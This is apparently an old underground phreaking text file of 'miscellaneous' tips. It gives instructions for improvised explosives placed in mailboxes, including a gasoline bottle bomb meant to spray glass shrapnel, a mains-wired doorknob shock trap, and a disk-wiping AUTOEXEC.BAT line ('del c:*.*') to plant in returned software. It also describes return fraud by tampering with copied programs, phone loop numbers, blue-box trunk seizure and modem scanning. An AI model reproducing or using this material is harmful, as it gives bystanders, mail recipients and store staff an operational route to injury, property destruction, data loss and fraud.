  
                  _____________________________
                 /                             \
                {+} MISCELLANEOUS INFORMATION {+}
                 \_____________________________/	



Easy explosive:

-fill Kodak film case (y'know, the black cylinder with the grey cap) 
with explosive of your choice.  Drill hole in grey lid, insert fuse, 
and tape it back together very tightly.  Light.

                        or:

-poke a hole it the grey cap facing outwards, and insert an M-80 
with fuse going through the hole and reseal, taping it tightly ALL 
AROUND the case.  Place in plastic mailbox, light, close door, and 
get the hell away!  Because of the tight airspace, the destructive 
power of the explosion is increased 5X.  Works under water too, with 
a drop of wax, or preferably rubber cement around where the cap and 
wick meet.
                         
                         and:

-fill a GLASS coke/pepsi bottle with 1 part gas, 1 part sugar, & 1 
part water. Wedge an M-80 into the top about halfway.  Shake the 
container, place in mailbox (hopefully with mail {hehe!}) light, and 
get the fuck away.  This thing sends glass shrapnel EVERYWHERE, 
including through their mail.


Doorknob Shocker:

-run a wire from one slot in wall outlet to the bracket in the wall 
that the knob's tongue inserts into.  Run another wire from the 
other slot to an inconspicuous spot on the DOORKNOB.  How does that 
one *grab* you?


Phone Loops:  (remember, tone + silence = connection)

    NUMBER     |    Tone/Silence (T/S) End  |  STATUS (on connection)
---------------------------------------------------------------------
?-???-???-????                S                no match
1-619-748-0002                T                definite tone

x-xxx-749-xxxx                T                definite tone
?-???-???-????                S                no match

1-619-739-0002                T                definite tone
x-xxx-xxx-xxx1                S                not sure of match

x-xxx-738-0002                T                definite
x-xxx-xxx-0020                S                definite

x-xxx-7xx-0002                T                definite
?-???-???-????                S                no match

Actually, any 1-619-7x9-000x gives tone detect, finding the other 
silent connection is a wee bit harder. 

If anyone manages to complete some of these, or any loops, please 
let me know.


The only bad thing about loop lines, is that eventually the Gestapo 
finds out about the over-use of the line, and assigns the # to 
anyone who wants a new # for their fone.  Then when phreaks begin to 
use the line again, thinking it is a loop, they get a pissed off 
yuppie who then has the call traced, and thats like putting your 
balls right in a door and slamming it.  The operator will complain 
in your face, and say some bullshit like she has your # and will 
report any disturbances to the fone co. if she sees it again.



Simple Virus/Easy Way To Return A Copied Program  (hehe!)

-when you buy a game, or something from a computer store, copy it, 
and want to return it (I know all of you do this), sometimes all the 
store does is re-cellophane it and it goes back on the shelves 
without being re-tested.  If the original floppies have an 
AUTOEXEC.BAT file on them to initiate the copying/decompression at 
boot-up, simply edit it to say:

cd\
del c:*.*
y

That'll make someone's day real funny, especially if the store tries 
to test it.  Or, in most cases the store will not accept returned 
merchandise if it is not defective, so DEFECT IT.  This is done by 
using a program that shows the date and time the originals were last 
modified (check for this BEFORE installing the program!!!!!!) such as 
Dosshell, or XTGold.  Then set the date and time on your computer to 
match the originals date and time (approx).  Install the program, 
and/or copy the originals and manuals.  Now fuck around with 
the decompression file (usually PKUNZIP), the installation file, and 
any others you see.  Now the store has no reason, and MUST accept 
the product as a return, or sometimes they will give you a return 
check for the $$, and send the program back to the manufacturer, 
which is good, because it will then be recopied, resealed, and put 
back on the shelves somewhere for another phreaker to HACK!!

(If the above date/time matching is too much of a pain for the 
really retarded out there, set your computer date/time to any past 
ones close to the originals, and fuck with ALL the files, thus 
making them all match.)



Battery Bombs:

-Batteries like Duracell, Eveready, Energizer, etc... are specially 
made for home use and will not under any condition, explode when 
simply connected to each other.  Therefore, generic batteries are 
required.  These batteries can be obtained in hick country, or from 
a shitty wholesaler.  I've heard of phriends putting 9Vs in the 
fucking microwave for a minute or so, and this is supposed to 
disable the "exploder protector", but anyone who puts batteries in a 
microwave, should have the batteries explode on them.  EXODUS takes no 
responsibility for anything in this file!!!  I never found out if 2 
9v batts connected really do explode.  I hope so.


Any Blue Boxers??

-Not many people use blue boxes these days.  They've become an 
eminent danger to phreakers. Ma Bell has new equipment to detect the 
use of tone-emmitting boxes, and about the only safe place to box 
calls from is the handy-dandy pay phone at the end of the block. 
The only way to box calls today is to switch off to another 
switching system with another number:  ie-

-call a store like Toys-'R'-Us, (1-908-322-6065 Livingston, NJ) and 
ask for the technical (video game) department.  This switches the 
number from the above to the extension of the department, usually 
and extension, but it can be a totally different # you are sent to 
while you are on hold.  This is VERY good. Bullshit the employee at 
the tech dept., and wait for HIM to hang up first.  That disconnects 
you from his department, but not from the innerconnections of the 
store. (it might even be possible to dial a number and get another 
department at this point).  This is like 'stacking' trunks. Their 
dialtone (inside the store) may have a slightly higher/lower pitch 
than a dialtone at your house.  This is what you want.  Now, blow 
2600 accross the line, and you should have access to a trunk, and 
Bell Labs think that the store did it, and it is not usually 
questioned because the computer might think that it is part of their 
paging system. (not 100% sure, test around)

-when someone (preferably who you don't give a shit about) calls, 
dial *69 to ring him back.(if your area suscribes to this feature)
What sould happen is that the *69 tone asks the Bell computer to 
call back the person.  The COMPUTER does the calling at this point.  
Now when your friend picks up, bullshit him into hanging up first.  
Now the computer is getting the dialtone first, then it passes it on 
to you.  If you blow 2600 at this point, the computer may think it 
is its own equipment doing the calling.  I'm REALLY not sure about 
this one.  Hopefully this one works, but I can't test it because 
some fucked up, shit full, douche nozzle, pig fucker broke my 
MF box. <frown> MF boxes are not that hard to come by.  Many hobby 
shops, music instrument stores, or electronic stores may sell the MF 
box itself, or one that detects tones, which can be used in the 
reverse way.


Good Technical Phone Numbers:

-sometimes the hardest part of getting technical support is finding 
a place to look.  An easy place is M.I.T. (HOME OF THE ORIGINAL 
PHREAKS) Find the number for the Electronic engineering campus, call 
and say you would like the number for (give room # make one up if 
you have to), or call the person incharge of dorm assignments (buy a 
college book if you need to).  Enentually, if done right, you will 
have a list of possible #s, and set your modem on scan, and look for 
carrier detect.  One of these nerds...ahm! I mean Geniuses must have 
a computer with a modem, and these guys will answer about 100% of 
your technical problems.



Practical Jokes:

-if you are into practical jokes like I am, than here is a book for 
you:

"The Second Official Handbook of Practical Jokes"

by: Peter Van Der Linden

There are hundreds of good practical jokes and phone scams, as well 
as a section of computer jokes, with a whole program of re-writing 
the COMMAND.COM file to be funnier than ever.






                              <--* Out To Help The Common Phreak *-->


                                           --------------007
 